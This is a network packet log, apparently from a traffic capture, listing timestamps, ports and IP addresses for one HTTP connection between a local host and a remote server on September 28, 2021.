Sep 28, 2021 08:53:35.252363920 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252384901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252409935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252433062 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252450943 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.252454996 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252476931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252525091 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.252583027 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.252667904 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252685070 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.252769947 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.252860069 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.253010035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.253034115 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.253060102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.253084898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.253094912 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.253166914 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.261244059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261431932 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.261576891 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261604071 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261626959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261651039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261673927 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261701107 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.261724949 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261795044 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261817932 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261830091 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.261856079 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.261871099 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261915922 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.261929989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.261970043 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.262054920 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.262135983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.262202024 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.262209892 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.262224913 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.262247086 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.262268066 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.262269020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.262290001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.262343884 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.262425900 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.274578094 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.274724960 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.275240898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275268078 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275289059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275310993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275332928 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275355101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275357008 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.275377035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275378942 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.275398970 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275424004 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275449038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275469065 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.275470972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.275475979 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.275496960 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.275558949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280148983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280224085 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280244112 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280261993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280277014 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280319929 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280319929 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280338049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280380964 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280396938 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280416965 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280431986 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280445099 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280447960 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280457973 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280463934 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280479908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280498028 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280498981 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280517101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280518055 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280533075 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280536890 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280549049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280553102 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280564070 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280565023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280579090 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280595064 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280610085 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280637026 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280651093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280684948 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280698061 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280741930 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280745983 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280760050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280788898 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280838013 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280853987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280862093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280873060 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280889034 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280926943 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280930996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.280977011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280994892 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.280999899 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.281007051 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.281054974 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.281065941 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.281075001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.281090975 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.281121969 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.281177044 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.281943083 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.281964064 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.281975985 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.281987906 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.282004118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.282017946 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.282033920 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.282049894 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.282057047 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.282114983 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.282145977 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.282150030 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.282152891 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.282227039 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.283210993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283236027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283247948 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283258915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283375025 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.283493042 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.283504963 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.283601046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283720970 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283777952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283816099 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.283860922 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.283919096 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.284224033 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.285346985 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.285376072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.285397053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.285415888 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.285439968 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.285497904 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.288770914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.288815975 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.288836956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.288856983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.288882017 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.288902998 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.288933992 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.288968086 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.288973093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.292968988 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.293428898 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.296777010 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297331095 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297354937 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297375917 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297395945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297413111 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297416925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297439098 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297440052 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297461987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297466040 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297482967 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297516108 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297542095 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297564030 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297584057 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297593117 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297605038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297625065 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297635078 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297661066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297673941 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.297681093 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.297723055 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.317015886 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317104101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317137957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317164898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317199945 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317238092 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317280054 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317277908 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.317308903 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.317315102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317348957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317375898 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.317392111 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317424059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.317456961 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.318975925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.319006920 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.319020987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.319029093 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.319091082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.319123030 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.321157932 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321187973 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321202040 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321209908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321223021 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321238995 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321255922 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321269035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321283102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321285963 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.321300983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321312904 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.321319103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321329117 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.321337938 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321356058 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321366072 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.321372032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321384907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.321412086 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.321435928 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.613862038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.613888979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.613903046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.613909960 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.614144087 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.653131962 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653171062 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653182983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653202057 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653219938 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653234959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653301954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653318882 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653331041 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653342962 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.653363943 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.653435946 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.653444052 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.691873074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.691917896 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.691931963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.691945076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.693809986 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.693953991 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.693973064 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.693985939 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.693998098 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694010973 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694025993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694039106 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694050074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694066048 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694082975 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694097996 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694103003 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.694113016 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.694127083 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.694150925 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.694181919 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.734841108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.734911919 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.734930038 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.734946012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.734961033 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.734976053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.734991074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735007048 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735022068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735039949 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735057116 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735073090 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735085011 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735104084 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735131025 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735131979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735152006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735155106 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735162973 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735179901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735191107 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735203028 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735219002 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735238075 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735243082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735254049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735264063 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735268116 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735270023 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735321999 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735340118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735344887 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735352039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735363007 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735373974 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735378981 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735389948 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735398054 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735433102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735445976 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735450983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735464096 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735476017 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735491037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735506058 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735523939 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735542059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735553026 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735563040 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735564947 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735574961 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735580921 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735594034 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735626936 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735645056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735646009 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735652924 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735656023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.735661983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735675097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735690117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.735709906 CEST	80	49744	185.138.164.150	192.168.2.3
